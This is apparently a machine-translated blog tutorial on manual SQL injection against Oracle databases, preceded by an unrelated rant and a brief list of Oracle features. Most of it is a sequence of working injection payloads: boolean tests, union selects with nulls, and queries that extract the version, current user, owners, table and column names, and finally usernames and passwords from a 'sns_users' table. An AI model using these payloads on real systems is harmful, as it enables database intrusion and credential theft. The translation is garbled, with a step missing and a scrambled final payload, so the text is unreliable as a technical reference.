This society, most pathetic than those who neither study gangsters, not all people learn slag, they did not understand the lesson, do not work, do not skip class, do not make trouble discipline, anxious for the exam, but frustration with the status quo, heat for three minutes, and hate themselves to blame, even based on the most common identity buried in the crowd, they are doing most days of suffering. . . .
A, Oracle database
Generally large enterprises will be used, logistics, tourism, aviation, banking and so on. . .
1, supports multiple users, processing large transaction volumes
2, data security and integrity effective control
3, support for distributed data processing
4, strong transplantation
Second, manual injection
1, it is determined whether there
and 1 = 1 to return to normal
and 1 = 2 returns an error
2, to determine whether the Oracle database
and exists(select * from dual)
and exists(select * from user_tables)
Return to normal explanation is the oracle
3, the number of columns is determined
order by 2 to return to normal, indicating two
4, the joint inquiry
union select null, null from dual, there can not write 1, 2, needs to be replaced with a null, then replace it with numbers and each null characters, numbers found on the error, the character is not being given
union select 1,null from dual 报错
union select null,1 from dual 报错
union select 'null', 'null' from dual returns this interface, then you can use the following query
5, access to database version
(select banner from sys.v_$Version where rownum=1)
6, to obtain the current user's connection to the database
(select SYS_CONTEXT(‘USERENV’,‘CURRENT_USER’)from dual)
7, access to database
(Select instance_name from v $ instance) to get the current database
(Select owner from all_tables where rownum = 1) obtaining a first database
(Select owner from all_tables where rownum = 1 and owner <> 'SYS') obtaining a second database
8, to obtain the table name
(select table_name from user_tables where rownum=1 and table_name like ‘%users%’) from dual
10, access to the column name
(select column_name from user_tab_columns where table_name=‘sns_users’ and rownum=1)
11, acquiring a second column name
(select column_name from user_tab_columns where table_name=‘sns_users’ and rownum=1 and column_name<>‘USER_NAME’)
12, access to the contents of the field
= =. 1. 1 and ID 2 SELECT USER_NAME Union, from the user_pwd "sns_users"
Union SELECT USER_NAME, from the user_pwd "sns_users" WHERE USER_NAME <> 'Hu' acquires the second user information
Prohibit illegal peril
welcome public attention number: web security tool library